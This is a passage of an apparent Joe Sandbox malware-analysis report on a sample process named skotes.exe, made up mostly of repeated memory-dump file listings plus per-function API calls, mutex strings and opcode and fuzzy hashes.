Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction ID: 124469340639c694326a8b39252ebb809217ad669817e19aac9aaabbd3da025b
Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction Fuzzy Hash: 4DB14632D002499FEB11CF28D8917EEBBF5EF55360F14426AE855EB2C2D6388D42CB60

Function 009EBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 009EBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 009EBBE4
_xtime_get.LIBCPMT ref: 009EBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 009EBC13

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: a3da72e5dff52e3a4e9ffaececd4f4d5a91f3933fb772cc2eba7dc4b71bd4b88
Instruction ID: 19c3b3b8a110a30b0d9baebd642033a8cc80a48971328818fabd6a5b8ab78593
Opcode Fuzzy Hash: a3da72e5dff52e3a4e9ffaececd4f4d5a91f3933fb772cc2eba7dc4b71bd4b88
Instruction Fuzzy Hash: 512133B5900159AFDF01EFA5DC85ABFB779EF48710F110425F941B7251DB34AD029B90

Analysis Process: skotes.exePID: 6108, Parent PID: 5340COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1852
Total number of Limit Nodes:	15

Executed Functions

Function 0076652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0076652A,?,?,?,?,?,00767661), ref: 00766566

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e1a26f1dcdfa5b6612cd71a992ff8c44739f861642b16349d7680cc49f83cf42
Instruction ID: 017edb9937110cbab15131ea9f3e661e2f1f8e1d8a88cb1cdac9087463de5aa1
Opcode Fuzzy Hash: e1a26f1dcdfa5b6612cd71a992ff8c44739f861642b16349d7680cc49f83cf42
Instruction Fuzzy Hash: C0E08C30542148EBCE257B18D91ED8D3B29EB21745F800810FC0B8A22BCB29ED92CE90

Function 00739BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: 49c4adaaaa480d69ac8ce19655fe6d092dfd98e57f7d28b9bd595a3709a5de8e
Instruction ID: 32b907c598edecc7f8988882dcb861ed3dc1cbd7fd588feb9b471015aeab6d34
Opcode Fuzzy Hash: 49c4adaaaa480d69ac8ce19655fe6d092dfd98e57f7d28b9bd595a3709a5de8e
Instruction Fuzzy Hash: 333148717042009BFB189B7CEC8E7ADB762EBD1310F248219E154AB2D7D77D99818762

Function 00739F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: d6fa1ec93735491a112e26c6231266729e1ced62a661914f4b6561564fd1342d
Instruction ID: 9b0c6cbb3a61260d4463f982e1b396e67ff68986c4c39596b0836d8e2dcfea5d
Opcode Fuzzy Hash: d6fa1ec93735491a112e26c6231266729e1ced62a661914f4b6561564fd1342d
Instruction Fuzzy Hash: 44317971704204ABFB189B7CDC9D7ADB762EBC5310F208219E094EB2D7E77D99808752

Function 0073A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
